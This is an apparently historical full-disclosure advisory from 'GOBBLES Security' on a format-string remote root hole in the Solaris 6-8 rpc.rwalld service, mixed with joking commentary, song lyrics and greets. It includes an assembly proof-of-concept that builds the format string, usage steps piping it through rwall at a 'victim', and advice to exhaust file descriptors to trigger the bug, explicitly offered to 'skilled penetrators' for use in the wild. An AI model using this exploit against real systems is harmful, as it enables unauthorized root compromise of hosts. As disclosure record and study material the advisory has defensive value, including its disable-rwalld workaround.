Adivosry + Exploit for Remote Root Hole in Default Installation of Popular Commercial Operating System

[gobbles () hushmail com]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

GOBBLES SECURITY ADVISORY #32

ALERT! REMOTE ROOT HOLE IN DEFAULT INSTALL OF POPULAR OPERATING SYSTEM! ALERT!

Forward:
<@route> so was fydor trying to make his code unreadable when he write nmap?
<@route> or was that just the fallout of poor planning?
<@route> this is awful
<@route> if ( !victim || !sport || !dport || sd < 0) {
<@route>   fprintf(stderr, "send_udp_raw: One or more of your parameters
         suck!\n");
<@route>   free(packet);
<@route>   return -1;
<@route> }
<@route> This is the program that is used everywhere and written up in
         countless books?
<@route> it's pretty much obscene that this program doesnt use libnet

Systems Affected:
Sun Solaris 6, Sun Solaris 7, Sun Solaris 8
(sparc and x86 versions)


Threat Level:
Super duper high.


Vendor Notification Status:
Initial advisory sent to Sun Microsystems on Friday, April 5th.

After long series of email exchange, Sun.com engineers finally begin working
on developing patch for bug.

Days later, CERT contact GOBBLES about bug.  Dialouge happen then too with
CERT.  Both Sun Microsystems and CERT have promised to make sure that
GOBBLES name is in both official advisories released.  Hey, we do this for
fame and attention, now that we are no longer weaned we must do something!

Some time, full disclosure is real pain in ass.  Everyone want more and more
time to get things fixed before advisory is released.  Time to grace lists
with more GOBBLES Advisory.


Exploit:
A proof-of-concept exploit for this vulnerability has been attached to the
bottom of this email.  GOBBLES wrote it in way to keep unskilled from using
it, like security assesment team from Vigilante who not able to tell if
vulnerability is real or not in opensourced product after reading advisory.
At the same time, skilled penetrators should not have any trouble using the
code provided to exploit systems in the wild.

Don't send GOBBLES email asking for other versions of exploit.  Some things
better left private and given to close friends for their own motivations.
If you can't figure out how to work with this exploit and get remote root
from what is provided in the advisory, really there is no reason for you to
be using an exploit.


A Few Words:
There are some thing that GOBBLES have to say, some thing very heartfelt
that he need to communicate to the world, some thing that best said in song,
please take time to read lyric and understand what GOBBLES trying to say. . .

"the sun has blessed
 the rays are gone
 and all the kids have left their tears and gone home,

 sweet 17, sour 29
 and i can't explain myself
 what i'd hoped to find
 you were all so kind
 when i was near,

 and if you're still feeling down
 then maybe you need me around
 to love and hold you
 don't say i hadn't told you so
 maybe you need me around,

 i had no luck
 i had no shame
 i had no cause
 just seventeen days of rain
 and you in my eyes,

 just one more song to slay this earth
 and i can't explain myself just what it's worth
 what was all i had
 but not all i'd need
 and i can't escape the fact that i still bleed,

 and if you're still feeling down
 and if this seems way too loud
 then maybe you need me around,

 i had no voice
 i had no drive
 i had no choice
 i've done my time
 had myself
 had my band
 i had my love
 had no hand in watching it all fall apart

 and if you're still feeling down
 then maybe you need me around
 to lift and scold you
 to send you crashing all right now
 maybe you need me around."

- -Blissed and Gone, the Smashing Pumpkins


Description of Problem (Part One):
One of the default RPC services in Sun Solaris versions 6-8 is has an
insecure syslog() statement, which allow remote attacker to execute custom
code as root.

Hehe, GOBBLES bet you getting pissed because in all this length of advisory,
still no mention of what is vulnerable, hehehe, ;PPPPpppppppppppppppp.  Keep
control of temper, and keep reading, because you about to find out, hehehe
GOBBLES is silly today.


Remotely Exploitable:
Yes.

Locally Exploitable:
Yes.

Privilage Attained After Exploitation:
Root.

Exploit Included:
As GOBBLES did mention previously, yes.  It get you root.  Girls will be
impressed with mailing list reading skills and source code leeching
technique utilized to gain remote root to Solaris machines.  Included
exploit for Sparc.


Name of Vulnerable Service:
$ grep rwall /etc/inetd.conf
# The rwall server allows others to post messages to users on this machine.
walld/1         tli     rpc/datagram_v  wait root /usr/lib/netsvc/rwall/rpc.rwalld      rpc.rwalld

It rwalld that vulnerable.  It run as root.  Attacker get root from
exploiting it.


Description of Problem (Part Two):
Inside rwall_subr.c we see:

   /*
    * Make sure the wall programs exists, is executeable, and runs
    */
   if (rval == -1 || (wall.st_mode & S_IXUSR) == 0 ||
      (fp = popen(WALL_PROG, "w")) == NULL) {
          syslog(LOG_NOTICE,
                   "rwall message received but could not execute %s",
                   WALL_PROG);
          syslog(LOG_NOTICE, msg);

Bug easy enough to spot, but now question is, "GOBBLES, friend, how is
this to be exploited?  Faulty syslog() only called if rpc.rwalld can not
execute /usr/sbin/wall on local system, which mean it only exploitable if
admin have chmod -x or rm /usr/sbin/wall or something like this, right, so
why this so such a big deal?"

To this GOBBLES say, "Friend IDIOT, faulty syslog() is called if anything is
to make popen() fail, there one other way to exploit bug, which make it
dangerous and affect all installation of Solaris running rpc.rwalld, is that
popen() to fail if there no available file descriptors on system."

This easier to exploit locally on system.  For remote exploitation, timing
is important and thus is race condition.  Each new tcp session to running
service on target host will consume filedescriptor.  Then run attached
exploit to have root handed over, like operator status given to route in
#phrack with no question ask.


Patch Available:
Fucked if GOBBLES knows.


Suggested Workaround:
GOBBLES suggest that admin disable rwalld from /etc/inetd.conf until patch
made available, then restart it, if you wait until patch available until
upgrade you probably have to do upgrade by reinstalling operating system,
because now exploit out and probably in hands of less than ethical
penetrator looking to abuse you in one way or another.


Security Candy:

- -begin copy-

/*
   Remote Root Exploit for Solaris 6-8 rpc.walld

      Usage Instructions:
       1. Compile.
           gcc -o xwall xwall.s
       2. Run.
          (./xwall ; ./shellcode) | rwall victim
        3. Late Easter egg.
          strings xwall

      Note(s):
       Something else must be done to consume FD's on
       victim system.  Figure this one out for self.

       This exploit written to be run on Linux.  Supplied
       format string is for Sparc Solaris.  Provide own
       remote shellcode and use as above described.

   Love,
   GOBBLES Security
   http://www.bugtraq.org
   GOBBLES () hushmail com
*/


retloc:
.long 0x41424344
retaddr:
.long 0x60bb135
padding:
.long 4
walkcount:
.long 1
.globl main
.type main,@function
main:
pusha
movl (padding),%ecx
jusfhds7fg:
pushl %ecx
movl $4,%eax
movl $1,%ebx
pushl $0x00000041
movl %esp,%ecx
movl $1,%edx
int $0x80
popl %ecx
popl %ecx
loop jusfhds7fg
movl %esp,24(%esp)
pushl $0x42424242
movl $4,%edx
movl %esp,%ecx
movl $1,%ebx
movl $4,%eax
int $0x80
movl (retloc),%eax
bswapl %eax
pushl %eax
subl $4,%ecx
movl %edx,%eax
int $0x80
addl $4,%ecx
movl %edx,%eax
int $0x80
subl $4,%ecx
popl %eax
bswapl %eax
incl %eax
incl %eax
bswapl %eax
pushl %eax
movl %edx,%eax
int $0x80
popl %eax
movl %esp,%edx
incl %edx
xorl %esi,101(%ebp)
andb %al,111(%edx)
popa
pushl %edx
andb %al,97(%ebx)
decl %esi
aaa
andb %al,111(%ebx)
incl %esp
xorl (%ecx),%eax
movl (walkcount),%ecx
cmpl $0,%ecx
je nczxhczjcg89zg89
pushl %ecx
movl $4,%edx
movl $1,%ebx
pushl $0x78382e25
cmzxnczxcz8c:
pushl %ecx
movl %esp,%ecx
addl $4,%ecx
movl $4,%eax
int $0x80
popl %ecx
loop cmzxnczxcz8c
popl %ecx
popl %ecx
nczxhczjcg89zg89:
movl (retaddr),%edx
pushl %edx
shr $16,%edx
subl %edx,(%esp)
movw $0,2(%esp)
pushl %edx
shll $3,%ecx
subl %ecx,(%esp)
movl (padding),%edx
subl %edx,(%esp)
subl $16,(%esp)
movw $0,2(%esp)
pushl $cznxczxczxh8
call printf
movl $1,%eax
int $0x80
cznxczxczxh8:
.string "%%%uc%%hn%%%uc%%hn\n"

- -begin paste-


Greets:
route, because route deserves attention, use libnet it rulez.  route, why
you refuse GOBBLES interview on supposed intrusion on @stake subnet that was
allowed when some malicious local user ran trojaned blackhat warez?  GOBBLES
need to confirm with you if this really did happen, please respond soon...

Tracy () mp3 com, the Official Sysadmin Mascot of GOBBLES Security.  Thanks for
letting GOBBLES know to cut out the "leet gr33tz" from advisory, now people
hold lots of respect for GOBBLES.  Thanks Tracy, you're a peach.  Next
advisory will be disclosure of 0day CSS holes in mp3.com's website...

w00w00 Security Development, publishing advisories at the blinding speed of
1 per 3 years, and still being the largest active nonprofit security group in
the world, to the eyes of the public.  Disclosure is good when it serve a
political agenda, hehehehe...

The Securityfocus Staff, who often reject the legitimate research materials
of GOBBLES from their lists, but make sure they archive it on their website
anyways.  Thanks for at least giving us some of the credit that we deserve.
In the future, though, if our submissions don't meet your requirements for
publication on the lists, don't put them on your website.  Enough of this
double standards bullshit.

zen-parse, for defining what a whitehat is -- no skill, no ethic, no respect.

and finally, the beautiful Jennifer Garner, who play Sydney Bristow in tv
show Alias, who many member of GOBBLES Security is in love with.  You win free
GOBBLES Security tshirt, come to defcon in August to get it, hehehehehehe!




Hush provide the worlds most secure, easy to use online applications - which solution is right for you?
HushMail Secure Email http://www.hushmail.com/
HushDrive Secure Online Storage http://www.hushmail.com/hushdrive/
Hush Business - security for your Business http://www.hush.com/
Hush Enterprise - Secure Solutions for your Enterprise http://www.hush.com/

Looking for a good deal on a domain name? http://www.hush.com/partners/offers.cgi?id=domainpeople

-----BEGIN PGP SIGNATURE-----
Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com

wlwEARECABwFAjzOnwwVHGdvYmJsZXNAaHVzaG1haWwuY29tAAoJEBzRp5chmbAPt4sA
n0+78j2dzLIufxrdL5A8GcqG/ZPnAKCAnpQVJKw3PYNFN9fFjEfBcGCruQ==
=jCTV
-----END PGP SIGNATURE-----